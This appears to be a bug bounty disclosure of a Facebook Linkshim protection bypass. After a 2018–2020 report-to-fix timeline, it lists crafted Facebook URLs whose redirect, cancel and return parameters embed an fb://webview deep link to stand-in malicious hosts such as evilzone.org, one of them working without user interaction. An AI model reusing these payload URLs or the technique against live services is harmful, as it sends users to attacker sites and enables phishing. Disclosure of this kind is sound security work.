Facebook: Linkshim protection bypass using fb://webview

Using fb://webview deep link it is possible to bypass linkshim protection and user redirected to evilzon site without notice.

---

Timeline:

1. 12 September 2018: Reported
2. 13 September 2018: Triaged
3. 05 November 2020: Bounty Paid
4. 14 November 2020: Fix was released at server side.

---

Vulnerable endpoints was:

1. https://mbasic.facebook.com/a/feed\_menu.php?story\_fbid=xx&id=10000xx&menu\_id=u\_0\_0&continue=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttps%3A%2F%2Fevilzone.org&action=us&gfid=xx

Using continue button

1. https://m.facebook.com/friends/selector/?return\_uri=4&cancel\_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&friends\_key=ids&context&add\_photos\_uri&is\_initial\_render=0

Using cancel button

1. https://mbasic.facebook.com/stickers/229247431430xx/?redirect\_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttps%3A%2F%2Fevilzone.org

2. https://mbasic.facebook.com/messages/photo/?ids&tids%5B0%5D=cid.g.251480506187xxxx&message\_text&cancel=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org

3. https://mbasic.facebook.com/search/tabselector/?current\_tab=keywords\_top&cancel\_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&query=ok&is\_local\_serp=0&is\_trending=0&vertical=content&refid=46&ref=Footer

4. https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevil.com

5. https://mbasic.facebook.com/tokenizer/single/?mode=share\_msg&sid=91916771814xxxx&returnURI=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&zero\_e=2&zero\_et=1536231748&\_rdc=1&\_rdr

6. https://mbasic.facebook.com/photos/xtag\_faces/?photo\_id=1020467036791xxxx&owner\_id=18157600xx&return\_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&refid=13

7. https://mbasic.facebook.com/privacyx/selector/?redirect\_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&content\_id=8787365733&content\_type=1&selected\_param=28695816140xxxx&autosave=1

8. Without user interaction

https://mbasic.facebook.com/friends/hovercard/mbasic/?uid=4&redirectURI=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org